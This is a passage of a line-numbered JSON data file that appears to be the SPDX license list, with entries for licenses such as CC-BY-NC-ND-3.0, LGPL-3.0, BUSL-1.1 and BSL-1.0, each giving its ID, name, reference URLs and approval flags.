3266 "licenseId": "BSD-2-Clause-NetBSD",
3267 "seeAlso": [
3268 "http://www.netbsd.org/about/redistribution.html#default"
3269 ],
3270 "isOsiApproved": false
3271 },
3272 {
3273 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.html",
3274 "isDeprecatedLicenseId": false,
3275 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.json",
3276 "referenceNumber": 263,
3277 "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Unported",
3278 "licenseId": "CC-BY-NC-ND-3.0",
3279 "seeAlso": [
3280 "https://creativecommons.org/licenses/by-nc-nd/3.0/legalcode"
3281 ],
3282 "isOsiApproved": false
3283 },
3284 {
3285 "reference": "https://spdx.org/licenses/OSET-PL-2.1.html",
3286 "isDeprecatedLicenseId": false,
3287 "detailsUrl": "https://spdx.org/licenses/OSET-PL-2.1.json",
3288 "referenceNumber": 264,
3289 "name": "OSET Public License version 2.1",
3290 "licenseId": "OSET-PL-2.1",
3291 "seeAlso": [
3292 "http://www.osetfoundation.org/public-license",
3293 "https://opensource.org/licenses/OPL-2.1"
3294 ],
3295 "isOsiApproved": true
3296 },
3297 {
3298 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.html",
3299 "isDeprecatedLicenseId": false,
3300 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.json",
3301 "referenceNumber": 265,
3302 "name": "Creative Commons Attribution Non Commercial No Derivatives 2.0 Generic",
3303 "licenseId": "CC-BY-NC-ND-2.0",
3304 "seeAlso": [
3305 "https://creativecommons.org/licenses/by-nc-nd/2.0/legalcode"
3306 ],
3307 "isOsiApproved": false
3308 },
3309 {
3310 "reference": "https://spdx.org/licenses/SISSL-1.2.html",
3311 "isDeprecatedLicenseId": false,
3312 "detailsUrl": "https://spdx.org/licenses/SISSL-1.2.json",
3313 "referenceNumber": 266,
3314 "name": "Sun Industry Standards Source License v1.2",
3315 "licenseId": "SISSL-1.2",
3316 "seeAlso": [
3317 "http://gridscheduler.sourceforge.net/Gridengine_SISSL_license.html"
3318 ],
3319 "isOsiApproved": false
3320 },
3321 {
3322 "reference": "https://spdx.org/licenses/Wsuipa.html",
3323 "isDeprecatedLicenseId": false,
3324 "detailsUrl": "https://spdx.org/licenses/Wsuipa.json",
3325 "referenceNumber": 267,
3326 "name": "Wsuipa License",
3327 "licenseId": "Wsuipa",
3328 "seeAlso": [
3329 "https://fedoraproject.org/wiki/Licensing/Wsuipa"
3330 ],
3331 "isOsiApproved": false
3332 },
3333 {
3334 "reference": "https://spdx.org/licenses/Zimbra-1.4.html",
3335 "isDeprecatedLicenseId": false,
3336 "detailsUrl": "https://spdx.org/licenses/Zimbra-1.4.json",
3337 "referenceNumber": 268,
3338 "name": "Zimbra Public License v1.4",
3339 "licenseId": "Zimbra-1.4",
3340 "seeAlso": [
3341 "http://www.zimbra.com/legal/zimbra-public-license-1-4"
3342 ],
3343 "isOsiApproved": false
3344 },
3345 {
3346 "reference": "https://spdx.org/licenses/Linux-OpenIB.html",
3347 "isDeprecatedLicenseId": false,
3348 "detailsUrl": "https://spdx.org/licenses/Linux-OpenIB.json",
3349 "referenceNumber": 269,
3350 "name": "Linux Kernel Variant of OpenIB.org license",
3351 "licenseId": "Linux-OpenIB",
3352 "seeAlso": [
3353 "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/drivers/infiniband/core/sa.h"
3354 ],
3355 "isOsiApproved": false
3356 },
3357 {
3358 "reference": "https://spdx.org/licenses/LGPL-3.0.html",
3359 "isDeprecatedLicenseId": true,
3360 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0.json",
3361 "referenceNumber": 270,
3362 "name": "GNU Lesser General Public License v3.0 only",
3363 "licenseId": "LGPL-3.0",
3364 "seeAlso": [
3365 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
3366 "https://opensource.org/licenses/LGPL-3.0"
3367 ],
3368 "isOsiApproved": true,
3369 "isFsfLibre": true
3370 },
3371 {
3372 "reference": "https://spdx.org/licenses/OLDAP-2.5.html",
3373 "isDeprecatedLicenseId": false,
3374 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.5.json",
3375 "referenceNumber": 271,
3376 "name": "Open LDAP Public License v2.5",
3377 "licenseId": "OLDAP-2.5",
3378 "seeAlso": [
3379 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d6852b9d90022e8593c98205413380536b1b5a7cf"
3380 ],
3381 "isOsiApproved": false
3382 },
3383 {
3384 "reference": "https://spdx.org/licenses/AMPAS.html",
3385 "isDeprecatedLicenseId": false,
3386 "detailsUrl": "https://spdx.org/licenses/AMPAS.json",
3387 "referenceNumber": 272,
3388 "name": "Academy of Motion Picture Arts and Sciences BSD",
3389 "licenseId": "AMPAS",
3390 "seeAlso": [
3391 "https://fedoraproject.org/wiki/Licensing/BSD#AMPASBSD"
3392 ],
3393 "isOsiApproved": false
3394 },
3395 {
3396 "reference": "https://spdx.org/licenses/GPL-1.0-or-later.html",
3397 "isDeprecatedLicenseId": false,
3398 "detailsUrl": "https://spdx.org/licenses/GPL-1.0-or-later.json",
3399 "referenceNumber": 273,
3400 "name": "GNU General Public License v1.0 or later",
3401 "licenseId": "GPL-1.0-or-later",
3402 "seeAlso": [
3403 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
3404 ],
3405 "isOsiApproved": false
3406 },
3407 {
3408 "reference": "https://spdx.org/licenses/BUSL-1.1.html",
3409 "isDeprecatedLicenseId": false,
3410 "detailsUrl": "https://spdx.org/licenses/BUSL-1.1.json",
3411 "referenceNumber": 274,
3412 "name": "Business Source License 1.1",
3413 "licenseId": "BUSL-1.1",
3414 "seeAlso": [
3415 "https://mariadb.com/bsl11/"
3416 ],
3417 "isOsiApproved": false
3418 },
3419 {
3420 "reference": "https://spdx.org/licenses/Adobe-Glyph.html",
3421 "isDeprecatedLicenseId": false,
3422 "detailsUrl": "https://spdx.org/licenses/Adobe-Glyph.json",
3423 "referenceNumber": 275,
3424 "name": "Adobe Glyph List License",
3425 "licenseId": "Adobe-Glyph",
3426 "seeAlso": [
3427 "https://fedoraproject.org/wiki/Licensing/MIT#AdobeGlyph"
3428 ],
3429 "isOsiApproved": false
3430 },
3431 {
3432 "reference": "https://spdx.org/licenses/0BSD.html",
3433 "isDeprecatedLicenseId": false,
3434 "detailsUrl": "https://spdx.org/licenses/0BSD.json",
3435 "referenceNumber": 276,
3436 "name": "BSD Zero Clause License",
3437 "licenseId": "0BSD",
3438 "seeAlso": [
3439 "http://landley.net/toybox/license.html"
3440 ],
3441 "isOsiApproved": true
3442 },
3443 {
3444 "reference": "https://spdx.org/licenses/W3C-19980720.html",
3445 "isDeprecatedLicenseId": false,
3446 "detailsUrl": "https://spdx.org/licenses/W3C-19980720.json",
3447 "referenceNumber": 277,
3448 "name": "W3C Software Notice and License (1998-07-20)",
3449 "licenseId": "W3C-19980720",
3450 "seeAlso": [
3451 "http://www.w3.org/Consortium/Legal/copyright-software-19980720.html"
3452 ],
3453 "isOsiApproved": false
3454 },
3455 {
3456 "reference": "https://spdx.org/licenses/FSFUL.html",
3457 "isDeprecatedLicenseId": false,
3458 "detailsUrl": "https://spdx.org/licenses/FSFUL.json",
3459 "referenceNumber": 278,
3460 "name": "FSF Unlimited License",
3461 "licenseId": "FSFUL",
3462 "seeAlso": [
3463 "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License"
3464 ],
3465 "isOsiApproved": false
3466 },
3467 {
3468 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.html",
3469 "isDeprecatedLicenseId": false,
3470 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.json",
3471 "referenceNumber": 279,
3472 "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Unported",
3473 "licenseId": "CC-BY-NC-SA-3.0",
3474 "seeAlso": [
3475 "https://creativecommons.org/licenses/by-nc-sa/3.0/legalcode"
3476 ],
3477 "isOsiApproved": false
3478 },
3479 {
3480 "reference": "https://spdx.org/licenses/DOC.html",
3481 "isDeprecatedLicenseId": false,
3482 "detailsUrl": "https://spdx.org/licenses/DOC.json",
3483 "referenceNumber": 280,
3484 "name": "DOC License",
3485 "licenseId": "DOC",
3486 "seeAlso": [
3487 "http://www.cs.wustl.edu/~schmidt/ACE-copying.html",
3488 "https://www.dre.vanderbilt.edu/~schmidt/ACE-copying.html"
3489 ],
3490 "isOsiApproved": false
3491 },
3492 {
3493 "reference": "https://spdx.org/licenses/TMate.html",
3494 "isDeprecatedLicenseId": false,
3495 "detailsUrl": "https://spdx.org/licenses/TMate.json",
3496 "referenceNumber": 281,
3497 "name": "TMate Open Source License",
3498 "licenseId": "TMate",
3499 "seeAlso": [
3500 "http://svnkit.com/license.html"
3501 ],
3502 "isOsiApproved": false
3503 },
3504 {
3505 "reference": "https://spdx.org/licenses/MIT-open-group.html",
3506 "isDeprecatedLicenseId": false,
3507 "detailsUrl": "https://spdx.org/licenses/MIT-open-group.json",
3508 "referenceNumber": 282,
3509 "name": "MIT Open Group variant",
3510 "licenseId": "MIT-open-group",
3511 "seeAlso": [
3512 "https://gitlab.freedesktop.org/xorg/app/iceauth/-/blob/master/COPYING",
3513 "https://gitlab.freedesktop.org/xorg/app/xvinfo/-/blob/master/COPYING",
3514 "https://gitlab.freedesktop.org/xorg/app/xsetroot/-/blob/master/COPYING",
3515 "https://gitlab.freedesktop.org/xorg/app/xauth/-/blob/master/COPYING"
3516 ],
3517 "isOsiApproved": false
3518 },
3519 {
3520 "reference": "https://spdx.org/licenses/AMDPLPA.html",
3521 "isDeprecatedLicenseId": false,
3522 "detailsUrl": "https://spdx.org/licenses/AMDPLPA.json",
3523 "referenceNumber": 283,
3524 "name": "AMD\u0027s plpa_map.c License",
3525 "licenseId": "AMDPLPA",
3526 "seeAlso": [
3527 "https://fedoraproject.org/wiki/Licensing/AMD_plpa_map_License"
3528 ],
3529 "isOsiApproved": false
3530 },
3531 {
3532 "reference": "https://spdx.org/licenses/Condor-1.1.html",
3533 "isDeprecatedLicenseId": false,
3534 "detailsUrl": "https://spdx.org/licenses/Condor-1.1.json",
3535 "referenceNumber": 284,
3536 "name": "Condor Public License v1.1",
3537 "licenseId": "Condor-1.1",
3538 "seeAlso": [
3539 "http://research.cs.wisc.edu/condor/license.html#condor",
3540 "http://web.archive.org/web/20111123062036/http://research.cs.wisc.edu/condor/license.html#condor"
3541 ],
3542 "isOsiApproved": false,
3543 "isFsfLibre": true
3544 },
3545 {
3546 "reference": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.html",
3547 "isDeprecatedLicenseId": false,
3548 "detailsUrl": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.json",
3549 "referenceNumber": 285,
3550 "name": "PolyForm Noncommercial License 1.0.0",
3551 "licenseId": "PolyForm-Noncommercial-1.0.0",
3552 "seeAlso": [
3553 "https://polyformproject.org/licenses/noncommercial/1.0.0"
3554 ],
3555 "isOsiApproved": false
3556 },
3557 {
3558 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.html",
3559 "isDeprecatedLicenseId": false,
3560 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.json",
3561 "referenceNumber": 286,
3562 "name": "BSD 3-Clause No Military License",
3563 "licenseId": "BSD-3-Clause-No-Military-License",
3564 "seeAlso": [
3565 "https://gitlab.syncad.com/hive/dhive/-/blob/master/LICENSE",
3566 "https://github.com/greymass/swift-eosio/blob/master/LICENSE"
3567 ],
3568 "isOsiApproved": false
3569 },
3570 {
3571 "reference": "https://spdx.org/licenses/CC-BY-4.0.html",
3572 "isDeprecatedLicenseId": false,
3573 "detailsUrl": "https://spdx.org/licenses/CC-BY-4.0.json",
3574 "referenceNumber": 287,
3575 "name": "Creative Commons Attribution 4.0 International",
3576 "licenseId": "CC-BY-4.0",
3577 "seeAlso": [
3578 "https://creativecommons.org/licenses/by/4.0/legalcode"
3579 ],
3580 "isOsiApproved": false,
3581 "isFsfLibre": true
3582 },
3583 {
3584 "reference": "https://spdx.org/licenses/OGL-Canada-2.0.html",
3585 "isDeprecatedLicenseId": false,
3586 "detailsUrl": "https://spdx.org/licenses/OGL-Canada-2.0.json",
3587 "referenceNumber": 288,
3588 "name": "Open Government Licence - Canada",
3589 "licenseId": "OGL-Canada-2.0",
3590 "seeAlso": [
3591 "https://open.canada.ca/en/open-government-licence-canada"
3592 ],
3593 "isOsiApproved": false
3594 },
3595 {
3596 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.html",
3597 "isDeprecatedLicenseId": false,
3598 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.json",
3599 "referenceNumber": 289,
3600 "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 IGO",
3601 "licenseId": "CC-BY-NC-SA-3.0-IGO",
3602 "seeAlso": [
3603 "https://creativecommons.org/licenses/by-nc-sa/3.0/igo/legalcode"
3604 ],
3605 "isOsiApproved": false
3606 },
3607 {
3608 "reference": "https://spdx.org/licenses/EFL-1.0.html",
3609 "isDeprecatedLicenseId": false,
3610 "detailsUrl": "https://spdx.org/licenses/EFL-1.0.json",
3611 "referenceNumber": 290,
3612 "name": "Eiffel Forum License v1.0",
3613 "licenseId": "EFL-1.0",
3614 "seeAlso": [
3615 "http://www.eiffel-nice.org/license/forum.txt",
3616 "https://opensource.org/licenses/EFL-1.0"
3617 ],
3618 "isOsiApproved": true
3619 },
3620 {
3621 "reference": "https://spdx.org/licenses/Newsletr.html",
3622 "isDeprecatedLicenseId": false,
3623 "detailsUrl": "https://spdx.org/licenses/Newsletr.json",
3624 "referenceNumber": 291,
3625 "name": "Newsletr License",
3626 "licenseId": "Newsletr",
3627 "seeAlso": [
3628 "https://fedoraproject.org/wiki/Licensing/Newsletr"
3629 ],
3630 "isOsiApproved": false
3631 },
3632 {
3633 "reference": "https://spdx.org/licenses/copyleft-next-0.3.0.html",
3634 "isDeprecatedLicenseId": false,
3635 "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.0.json",
3636 "referenceNumber": 292,
3637 "name": "copyleft-next 0.3.0",
3638 "licenseId": "copyleft-next-0.3.0",
3639 "seeAlso": [
3640 "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.0"
3641 ],
3642 "isOsiApproved": false
3643 },
3644 {
3645 "reference": "https://spdx.org/licenses/GPL-3.0-or-later.html",
3646 "isDeprecatedLicenseId": false,
3647 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-or-later.json",
3648 "referenceNumber": 293,
3649 "name": "GNU General Public License v3.0 or later",
3650 "licenseId": "GPL-3.0-or-later",
3651 "seeAlso": [
3652 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
3653 "https://opensource.org/licenses/GPL-3.0"
3654 ],
3655 "isOsiApproved": true,
3656 "isFsfLibre": true
3657 },
3658 {
3659 "reference": "https://spdx.org/licenses/CDLA-Permissive-2.0.html",
3660 "isDeprecatedLicenseId": false,
3661 "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-2.0.json",
3662 "referenceNumber": 294,
3663 "name": "Community Data License Agreement Permissive 2.0",
3664 "licenseId": "CDLA-Permissive-2.0",
3665 "seeAlso": [
3666 "https://cdla.dev/permissive-2-0"
3667 ],
3668 "isOsiApproved": false
3669 },
3670 {
3671 "reference": "https://spdx.org/licenses/CC-BY-ND-3.0.html",
3672 "isDeprecatedLicenseId": false,
3673 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0.json",
3674 "referenceNumber": 295,
3675 "name": "Creative Commons Attribution No Derivatives 3.0 Unported",
3676 "licenseId": "CC-BY-ND-3.0",
3677 "seeAlso": [
3678 "https://creativecommons.org/licenses/by-nd/3.0/legalcode"
3679 ],
3680 "isOsiApproved": false
3681 },
3682 {
3683 "reference": "https://spdx.org/licenses/C-UDA-1.0.html",
3684 "isDeprecatedLicenseId": false,
3685 "detailsUrl": "https://spdx.org/licenses/C-UDA-1.0.json",
3686 "referenceNumber": 296,
3687 "name": "Computational Use of Data Agreement v1.0",
3688 "licenseId": "C-UDA-1.0",
3689 "seeAlso": [
3690 "https://github.com/microsoft/Computational-Use-of-Data-Agreement/blob/master/C-UDA-1.0.md",
3691 "https://cdla.dev/computational-use-of-data-agreement-v1-0/"
3692 ],
3693 "isOsiApproved": false
3694 },
3695 {
3696 "reference": "https://spdx.org/licenses/Barr.html",
3697 "isDeprecatedLicenseId": false,
3698 "detailsUrl": "https://spdx.org/licenses/Barr.json",
3699 "referenceNumber": 297,
3700 "name": "Barr License",
3701 "licenseId": "Barr",
3702 "seeAlso": [
3703 "https://fedoraproject.org/wiki/Licensing/Barr"
3704 ],
3705 "isOsiApproved": false
3706 },
3707 {
3708 "reference": "https://spdx.org/licenses/Vim.html",
3709 "isDeprecatedLicenseId": false,
3710 "detailsUrl": "https://spdx.org/licenses/Vim.json",
3711 "referenceNumber": 298,
3712 "name": "Vim License",
3713 "licenseId": "Vim",
3714 "seeAlso": [
3715 "http://vimdoc.sourceforge.net/htmldoc/uganda.html"
3716 ],
3717 "isOsiApproved": false,
3718 "isFsfLibre": true
3719 },
3720 {
3721 "reference": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.html",
3722 "isDeprecatedLicenseId": true,
3723 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.json",
3724 "referenceNumber": 299,
3725 "name": "GNU General Public License v2.0 w/Classpath exception",
3726 "licenseId": "GPL-2.0-with-classpath-exception",
3727 "seeAlso": [
3728 "https://www.gnu.org/software/classpath/license.html"
3729 ],
3730 "isOsiApproved": false
3731 },
3732 {
3733 "reference": "https://spdx.org/licenses/BitTorrent-1.1.html",
3734 "isDeprecatedLicenseId": false,
3735 "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.1.json",
3736 "referenceNumber": 300,
3737 "name": "BitTorrent Open Source License v1.1",
3738 "licenseId": "BitTorrent-1.1",
3739 "seeAlso": [
3740 "http://directory.fsf.org/wiki/License:BitTorrentOSL1.1"
3741 ],
3742 "isOsiApproved": false,
3743 "isFsfLibre": true
3744 },
3745 {
3746 "reference": "https://spdx.org/licenses/CDL-1.0.html",
3747 "isDeprecatedLicenseId": false,
3748 "detailsUrl": "https://spdx.org/licenses/CDL-1.0.json",
3749 "referenceNumber": 301,
3750 "name": "Common Documentation License 1.0",
3751 "licenseId": "CDL-1.0",
3752 "seeAlso": [
3753 "http://www.opensource.apple.com/cdl/",
3754 "https://fedoraproject.org/wiki/Licensing/Common_Documentation_License",
3755 "https://www.gnu.org/licenses/license-list.html#ACDL"
3756 ],
3757 "isOsiApproved": false
3758 },
3759 {
3760 "reference": "https://spdx.org/licenses/CC-BY-SA-1.0.html",
3761 "isDeprecatedLicenseId": false,
3762 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-1.0.json",
3763 "referenceNumber": 302,
3764 "name": "Creative Commons Attribution Share Alike 1.0 Generic",
3765 "licenseId": "CC-BY-SA-1.0",
3766 "seeAlso": [
3767 "https://creativecommons.org/licenses/by-sa/1.0/legalcode"
3768 ],
3769 "isOsiApproved": false
3770 },
3771 {
3772 "reference": "https://spdx.org/licenses/ADSL.html",
3773 "isDeprecatedLicenseId": false,
3774 "detailsUrl": "https://spdx.org/licenses/ADSL.json",
3775 "referenceNumber": 303,
3776 "name": "Amazon Digital Services License",
3777 "licenseId": "ADSL",
3778 "seeAlso": [
3779 "https://fedoraproject.org/wiki/Licensing/AmazonDigitalServicesLicense"
3780 ],
3781 "isOsiApproved": false
3782 },
3783 {
3784 "reference": "https://spdx.org/licenses/PostgreSQL.html",
3785 "isDeprecatedLicenseId": false,
3786 "detailsUrl": "https://spdx.org/licenses/PostgreSQL.json",
3787 "referenceNumber": 304,
3788 "name": "PostgreSQL License",
3789 "licenseId": "PostgreSQL",
3790 "seeAlso": [
3791 "http://www.postgresql.org/about/licence",
3792 "https://opensource.org/licenses/PostgreSQL"
3793 ],
3794 "isOsiApproved": true
3795 },
3796 {
3797 "reference": "https://spdx.org/licenses/OFL-1.1.html",
3798 "isDeprecatedLicenseId": false,
3799 "detailsUrl": "https://spdx.org/licenses/OFL-1.1.json",
3800 "referenceNumber": 305,
3801 "name": "SIL Open Font License 1.1",
3802 "licenseId": "OFL-1.1",
3803 "seeAlso": [
3804 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
3805 "https://opensource.org/licenses/OFL-1.1"
3806 ],
3807 "isOsiApproved": true,
3808 "isFsfLibre": true
3809 },
3810 {
3811 "reference": "https://spdx.org/licenses/NPL-1.0.html",
3812 "isDeprecatedLicenseId": false,
3813 "detailsUrl": "https://spdx.org/licenses/NPL-1.0.json",
3814 "referenceNumber": 306,
3815 "name": "Netscape Public License v1.0",
3816 "licenseId": "NPL-1.0",
3817 "seeAlso": [
3818 "http://www.mozilla.org/MPL/NPL/1.0/"
3819 ],
3820 "isOsiApproved": false,
3821 "isFsfLibre": true
3822 },
3823 {
3824 "reference": "https://spdx.org/licenses/xinetd.html",
3825 "isDeprecatedLicenseId": false,
3826 "detailsUrl": "https://spdx.org/licenses/xinetd.json",
3827 "referenceNumber": 307,
3828 "name": "xinetd License",
3829 "licenseId": "xinetd",
3830 "seeAlso": [
3831 "https://fedoraproject.org/wiki/Licensing/Xinetd_License"
3832 ],
3833 "isOsiApproved": false,
3834 "isFsfLibre": true
3835 },
3836 {
3837 "reference": "https://spdx.org/licenses/LGPL-2.0-only.html",
3838 "isDeprecatedLicenseId": false,
3839 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-only.json",
3840 "referenceNumber": 308,
3841 "name": "GNU Library General Public License v2 only",
3842 "licenseId": "LGPL-2.0-only",
3843 "seeAlso": [
3844 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
3845 ],
3846 "isOsiApproved": true
3847 },
3848 {
3849 "reference": "https://spdx.org/licenses/zlib-acknowledgement.html",
3850 "isDeprecatedLicenseId": false,
3851 "detailsUrl": "https://spdx.org/licenses/zlib-acknowledgement.json",
3852 "referenceNumber": 309,
3853 "name": "zlib/libpng License with Acknowledgement",
3854 "licenseId": "zlib-acknowledgement",
3855 "seeAlso": [
3856 "https://fedoraproject.org/wiki/Licensing/ZlibWithAcknowledgement"
3857 ],
3858 "isOsiApproved": false
3859 },
3860 {
3861 "reference": "https://spdx.org/licenses/OLDAP-2.2.1.html",
3862 "isDeprecatedLicenseId": false,
3863 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.1.json",
3864 "referenceNumber": 310,
3865 "name": "Open LDAP Public License v2.2.1",
3866 "licenseId": "OLDAP-2.2.1",
3867 "seeAlso": [
3868 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d4bc786f34b50aa301be6f5600f58a980070f481e"
3869 ],
3870 "isOsiApproved": false
3871 },
3872 {
3873 "reference": "https://spdx.org/licenses/APSL-1.0.html",
3874 "isDeprecatedLicenseId": false,
3875 "detailsUrl": "https://spdx.org/licenses/APSL-1.0.json",
3876 "referenceNumber": 311,
3877 "name": "Apple Public Source License 1.0",
3878 "licenseId": "APSL-1.0",
3879 "seeAlso": [
3880 "https://fedoraproject.org/wiki/Licensing/Apple_Public_Source_License_1.0"
3881 ],
3882 "isOsiApproved": true
3883 },
3884 {
3885 "reference": "https://spdx.org/licenses/BSD-3-Clause-LBNL.html",
3886 "isDeprecatedLicenseId": false,
3887 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-LBNL.json",
3888 "referenceNumber": 312,
3889 "name": "Lawrence Berkeley National Labs BSD variant license",
3890 "licenseId": "BSD-3-Clause-LBNL",
3891 "seeAlso": [
3892 "https://fedoraproject.org/wiki/Licensing/LBNLBSD"
3893 ],
3894 "isOsiApproved": true
3895 },
3896 {
3897 "reference": "https://spdx.org/licenses/GLWTPL.html",
3898 "isDeprecatedLicenseId": false,
3899 "detailsUrl": "https://spdx.org/licenses/GLWTPL.json",
3900 "referenceNumber": 313,
3901 "name": "Good Luck With That Public License",
3902 "licenseId": "GLWTPL",
3903 "seeAlso": [
3904 "https://github.com/me-shaon/GLWTPL/commit/da5f6bc734095efbacb442c0b31e33a65b9d6e85"
3905 ],
3906 "isOsiApproved": false
3907 },
3908 {
3909 "reference": "https://spdx.org/licenses/LGPL-3.0-only.html",
3910 "isDeprecatedLicenseId": false,
3911 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-only.json",
3912 "referenceNumber": 314,
3913 "name": "GNU Lesser General Public License v3.0 only",
3914 "licenseId": "LGPL-3.0-only",
3915 "seeAlso": [
3916 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
3917 "https://opensource.org/licenses/LGPL-3.0"
3918 ],
3919 "isOsiApproved": true,
3920 "isFsfLibre": true
3921 },
3922 {
3923 "reference": "https://spdx.org/licenses/OGC-1.0.html",
3924 "isDeprecatedLicenseId": false,
3925 "detailsUrl": "https://spdx.org/licenses/OGC-1.0.json",
3926 "referenceNumber": 315,
3927 "name": "OGC Software License, Version 1.0",
3928 "licenseId": "OGC-1.0",
3929 "seeAlso": [
3930 "https://www.ogc.org/ogc/software/1.0"
3931 ],
3932 "isOsiApproved": false
3933 },
3934 {
3935 "reference": "https://spdx.org/licenses/Dotseqn.html",
3936 "isDeprecatedLicenseId": false,
3937 "detailsUrl": "https://spdx.org/licenses/Dotseqn.json",
3938 "referenceNumber": 316,
3939 "name": "Dotseqn License",
3940 "licenseId": "Dotseqn",
3941 "seeAlso": [
3942 "https://fedoraproject.org/wiki/Licensing/Dotseqn"
3943 ],
3944 "isOsiApproved": false
3945 },
3946 {
3947 "reference": "https://spdx.org/licenses/MakeIndex.html",
3948 "isDeprecatedLicenseId": false,
3949 "detailsUrl": "https://spdx.org/licenses/MakeIndex.json",
3950 "referenceNumber": 317,
3951 "name": "MakeIndex License",
3952 "licenseId": "MakeIndex",
3953 "seeAlso": [
3954 "https://fedoraproject.org/wiki/Licensing/MakeIndex"
3955 ],
3956 "isOsiApproved": false
3957 },
3958 {
3959 "reference": "https://spdx.org/licenses/GPL-3.0-only.html",
3960 "isDeprecatedLicenseId": false,
3961 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-only.json",
3962 "referenceNumber": 318,
3963 "name": "GNU General Public License v3.0 only",
3964 "licenseId": "GPL-3.0-only",
3965 "seeAlso": [
3966 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
3967 "https://opensource.org/licenses/GPL-3.0"
3968 ],
3969 "isOsiApproved": true,
3970 "isFsfLibre": true
3971 },
3972 {
3973 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.html",
3974 "isDeprecatedLicenseId": false,
3975 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.json",
3976 "referenceNumber": 319,
3977 "name": "BSD 3-Clause No Nuclear License 2014",
3978 "licenseId": "BSD-3-Clause-No-Nuclear-License-2014",
3979 "seeAlso": [
3980 "https://java.net/projects/javaeetutorial/pages/BerkeleyLicense"
3981 ],
3982 "isOsiApproved": false
3983 },
3984 {
3985 "reference": "https://spdx.org/licenses/GPL-1.0-only.html",
3986 "isDeprecatedLicenseId": false,
3987 "detailsUrl": "https://spdx.org/licenses/GPL-1.0-only.json",
3988 "referenceNumber": 320,
3989 "name": "GNU General Public License v1.0 only",
3990 "licenseId": "GPL-1.0-only",
3991 "seeAlso": [
3992 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
3993 ],
3994 "isOsiApproved": false
3995 },
3996 {
3997 "reference": "https://spdx.org/licenses/IJG.html",
3998 "isDeprecatedLicenseId": false,
3999 "detailsUrl": "https://spdx.org/licenses/IJG.json",
4000 "referenceNumber": 321,
4001 "name": "Independent JPEG Group License",
4002 "licenseId": "IJG",
4003 "seeAlso": [
4004 "http://dev.w3.org/cvsweb/Amaya/libjpeg/Attic/README?rev\u003d1.2"
4005 ],
4006 "isOsiApproved": false,
4007 "isFsfLibre": true
4008 },
4009 {
4010 "reference": "https://spdx.org/licenses/AGPL-1.0-or-later.html",
4011 "isDeprecatedLicenseId": false,
4012 "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-or-later.json",
4013 "referenceNumber": 322,
4014 "name": "Affero General Public License v1.0 or later",
4015 "licenseId": "AGPL-1.0-or-later",
4016 "seeAlso": [
4017 "http://www.affero.org/oagpl.html"
4018 ],
4019 "isOsiApproved": false
4020 },
4021 {
4022 "reference": "https://spdx.org/licenses/OFL-1.1-no-RFN.html",
4023 "isDeprecatedLicenseId": false,
4024 "detailsUrl": "https://spdx.org/licenses/OFL-1.1-no-RFN.json",
4025 "referenceNumber": 323,
4026 "name": "SIL Open Font License 1.1 with no Reserved Font Name",
4027 "licenseId": "OFL-1.1-no-RFN",
4028 "seeAlso": [
4029 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
4030 "https://opensource.org/licenses/OFL-1.1"
4031 ],
4032 "isOsiApproved": true
4033 },
4034 {
4035 "reference": "https://spdx.org/licenses/BSL-1.0.html",
4036 "isDeprecatedLicenseId": false,
4037 "detailsUrl": "https://spdx.org/licenses/BSL-1.0.json",
4038 "referenceNumber": 324,
4039 "name": "Boost Software License 1.0",
4040 "licenseId": "BSL-1.0",
4041 "seeAlso": [
4042 "http://www.boost.org/LICENSE_1_0.txt",
4043 "https://opensource.org/licenses/BSL-1.0"
4044 ],
4045 "isOsiApproved": true,
4046 "isFsfLibre": true
4047 },
4048 {
4049 "reference": "https://spdx.org/licenses/Libpng.html",
